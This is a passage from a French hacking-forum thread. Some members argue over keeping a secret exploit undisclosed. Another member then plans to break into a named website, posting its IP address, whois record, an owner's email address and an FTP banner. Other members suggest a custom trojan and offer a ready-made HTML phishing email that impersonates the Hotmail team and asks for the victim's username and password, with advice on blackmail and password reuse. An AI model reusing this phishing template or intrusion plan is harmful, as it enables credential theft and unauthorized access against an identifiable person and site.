[Folcan]

Lol salopio ^^

[Invit]

C'est une ptite invention, un **No Sms** exploit très sympa et TRES puissant
Mais je n'en dirai pas plus, c'est top-secret!

loll... C'est ça la fameuse politique de partage de l'information inhérente aux hackers ?
Bon, je vais développer un peu, au risque de pas me faire des potes sur ce coups là...

C'est vraiment une invention, un truc si puissant que ça ? Nan parceque me dit que les gars s'enquiquinent à faire des attaques par fuzzing de mémoire partagée, des off-by-one overflows et autres shaters attacks, y ont bien tort parceque juste avec des failles de scripts (donc de script-kiddies, hein, d'où le nom) on peut être le maitre du monde, bref...

En plus, c'est un avis perso, mais me semble-t-il qu'éduquer vaut mieux que de sévir, tout comme "la sécurité par l'oppacité n'est pas valable", en l'occurence garder l'information confidentielle lève plusieurs points :
- c'est perdre une occasion de faire un bon tutoriel expliquant comment et pourquoi celà fonctionne, ou au moins un bulletin de sécu. dans la partie Hacking/News
- ça va à l'encontre de la politique de transparence et de partage de l'information chère aux hackers (me semble hein, plus très sûr...)
- le fait de ne pas la partager peut révèler, au choix :
      * une volonté de ne pas tenter les lamerz qui trainent sur le forum en quête de facilité et d'immédiat, mais surtout d'un certain pouvoir, une certaine puissance sur Internet pour palier à une frustration quelconque
auquel cas, il vaut mieux éduquer, certains trouveront que ça fait peut-être très paternaliste, moi je trouve que c'est typiquement le rôle de ceux qui savent, des ainés en quelque sorte, d'aiguiller les nouveaux venus, soit dans la voie du "je télécharge, je clique, je nuke, donc je suis un hacker" soit dans la voie "j'apprends continuellement, et plus j'apprends, plus je connais, plus je connais, plus j'apprends vite et donc efficacement" ("en outre, il y a toujours meilleur que moi donc pas la peine de fanfaronner") à savoir ce que je considère personnellement comme étant la vraie voie du hacking (indifferement de la couleur du chapeau, c'est un autre débat et un choix politique personnel)
      * ou bien une volonté de supériorité, c'est sûr que ça flatte l'ego, que le monde est beau quand on est au sommet...
au royaume des aveugles les borgnes sont rois.

enfin, je cite (MISC sept-oct. 2005, issu de l'article écrit par Nicolas Ruff et Eric Detoisien) :
"La conclusion que nous en tirons est largement partagée par la communauté de la sécurité : il n'y a pas d'attaques dignes de ce nom lancées sur Internet (ou alors les victimes n'en font pas état) et le niveau moyen des pirates est très faible (heureusement)."

Le post est peut-être mal placé et la critique peut sembler sévère, mais c'était pour faire suite aux précédents posts et je suis sûr que cette dernière sera reçue avec objectivité.
Encore désolé pour ce post un peu inclassable où l'on trouve de tout, mettons qu'au moins y'aura pas besoin de chercher pour avoir la totale :oops

BufferBob -

ps : j'aurais peut-etre du mettre ça dans les suggestions également, mais NC commençant à mon avis à se faire un nom sur la "scène" francophone, en ce qui me concerne j'apprécierais grandement des articles orientés technique, sur le fonctionnement des réseaux, le coding etc., la sécurité informatique étant la suite logique à ces deux disciplines et non une "matière" à part et indépendante.

[Nms]

BufferBob,

Tout d'abord sache que je suis tout à fait d'accord sur l'ensemble de ton post, le partage de l'information devrait primer et la volonté d'éduquer devrait prendre le dessus sur tout autre considération.

Cependant, si je ne révèle rien de plus sur mon "invention", c'est pour les raisons suivantes :
1) C'est un exploit qui se base sur une faille hyper basique (et toute conne) qui n'a toujours pas été corrigée à ce jour. Et pour cause, qd on connaît la faille on se dit qu'il n'y a vraiment pas grd chose à en tirer... Erreur! Tu serais sidéré de voir ce qu'on est capable de faire à partir de cette faille... Donc comme je n'ai pas envie de voir cette faille bouchée ds les mois qui arrivent, je ne la citerai pas et je n'expliquerai pas comment l'exploiter (à part aux gens en qui j'ai totalement confiance).
2) C'est un exploit très basique, dont la technique est à la portée de n'importe quelle personne ayant un minimum de bases informatiques. Il est même à l'opposé des exploits que tu cites. Il requiert de la patience pour pouvoir le mettre en forme mais son niveau technique est faible. Expliquer son principe reviendrait donc à laisser bon nombre de personnes sans scrupules le reproduire et l'utiliser à des fins pas très louables...
3) Oui il est puissant dans la mesure où il met à priori à disposition n'importe quelle information stockée sur ton dur. Je te laisse donc imaginer les possibilités que ça laisse...
4) Je tiens absolument à le mettre à l'abri des lamerz qui ne cherchent qu'à piquer des scripts puis les faire tourner sans essayer de comprendre comment ils marchent. "Waou ça marche chuis un bon!" --> non merci! Tu comprendras très bien je pense.

Voilà les principales raisons pr lesquelle je n'en dis pas plus, et pourquoi seules 2 personnes en connaissent le fonctionnement et les sources.
Si un jour la faille est bouchée, et donc que l'exploit n'est plus exploitable (^^) je pourrai révéler le principe, mais pas avant. Si je le faisais, tu ne peux même pas imaginer le carnage si ça tombe entre de mauvaises mains...
En tout cas ne t'inquiète pas je n'ai pas du tout mal pris ton post, et je l'ai même trouvé fort à propos! Maintenant que tu connais mes raisons, je pense que tu comprendras ma position.


P.S. : pr les tutos techniques, c en préparation! Vois ça avec Pegase si tu veux en proposer.

[2fast4you]

Alors toujours pas de solution

[anycilkler]

ben fait un tuto et envois le par MP je tente tout.
Fallait pas en parlez si tu voulais rien expliquer au lieu de nous mettre l'eau a la bouche
enfin bon tenpis je m'en rappellerais
bon sinon prend ton temps et pofine bien ton truc

[2fast4you]

Salut a tous je progresse un peu sur le piratge de mon (enfin ancien site)

Voila les infos que j'ai

   Domain Name: TAC26.COM
   Registrar: ONLINE SAS
   Whois Server: whois.bookmyname.com
   Referral URL: http://www.bookmyname.com
   Name Server: NS97.EDNS1.COM
   Name Server: NS98.EDNS1.COM
   Status: ACTIVE
   Updated Date: 04-feb-2005
   Creation Date: 16-oct-2002
   Expiration Date: 16-oct-2006

Ceque j'ai d autre le nom d utilisateur est toujours tac26 donc y a que le mot de passe qui a changé

L'adresse mail utiliser est spikee@wanadoo.fr

J'ai plusieur idée de faille aussi pour acceder au site

- passer par le livre d or ou part l'album photos des voiture qu il a mis en place je suis presque sur que tout les mot de passe sont identique

Ensuite j'ai fait une analyse avec shadow security scanner il me trouve au moins 10 faille critique mais je sais pas trop comment les exploiter

Voila en gros

[2fast4you]

A oui l'ip du site est 69.93.43.178

Par contre je peu pas me connecter en annonyme par le dos sa me met sa

220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 04:10. Server port: 21.
220 You will be disconnected after 15 minutes of inactivity.

Donc il n'autorise pas d'accées en anonyme

[2fast4you]

A oui autre chose il y a peut etre possibilité de pirater son adresse mail et se faire envoyer les passe dessus mais bon je pense pas que se soit possible de pirater une adresse wanadoo

[anycilkler]

triple post, c'est un nouveau record

[2fast4you]

J'oublie des chose c'est pour sa lol mais je m'entraine pour faire des records comme sa

[PEGASE]

Et de l infecter par troyen codé pour l occaz  c possibe ????

[2fast4you]

Je pense qu'il est équipé de bon antivirus mais lui faire envoyer quelque chose c'est entierment possible

[anycilkler]

ou alors tu fais un  fake-mail  par msn en lui demandant son mot de passe et tout, il faut une adresse msn du style administrateur@hotmail.com et dans le mail tu lui dit plein de conneries par rapport au serveur etc après si il est un peu bête il te répond, tu essaye voir si sais le bon pass qu'il ta envoyé et après ta 2 solutions tu le fait chanter ou alors tu teste voir si sur msn il a le même passe que sur le forum.
qu'en tu écrit le mail tu met sa:

<table border="0" cellpadding="0" cellspacing="0" width="63%" height="323" bordercolor="#FFFFFF">
  <tr>
    <td width="100%" height="21" colspan="2" align="center" bgcolor="#FFFFFF" bordercolor="#FFFFFF">
      <p align="center"> <img border="0" src="http://www.loadation.net/images/hotmail.gif" width="602" height="105">
</td>
  </tr>
  <tr>
    <td width="1%" align="center" valign="top" bgcolor="#FFFFFF" bordercolor="#FFFFFF">
    </td>
    <td width="100%" align="center" valign="top"><font face="Arial" size="2" color="#000000">Suite a de nombreux problèmes liés a l'enregistrement des mots de passe sur la base de<br />
données de hotmail, nous nous voyons contraints de vous redemander votre nom d'utilisateur et votre mot de passe.<br />
Pour vous prions donc de nous les envoyer en répondant à cet email.</font>
      <table border="0" cellpadding="0" cellspacing="0" width="100%">
        <tr>
          <td width="100%" bgcolor="#FFFFFF" bordercolor="#FFFFFF"><font face="Arial" size="2">Merci de votre compréhension</font>
            <p><i><font face="Arial" size="2">L'équipe hotmail</font></i></td>
        </tr>
      </table>
 </td>
    <td width="81%" height="302" align="center"></td>
  </tr>
</table>

ce qui te donne un bon truc, bien sur a la place du petit texte déjà mis, tu met se que tu veux.
PS:évite les fautes d'orthographe.
voilà

[comtezero]

Ultra connu mais peut-être que ca peut marcher.

[anycilkler]

t'attendais quand même pas que je lui trouve une faille pas très connu, c'est moi quand même
sinon moi je pense que sa peut marcher si c'est bien fait, c'est tout un art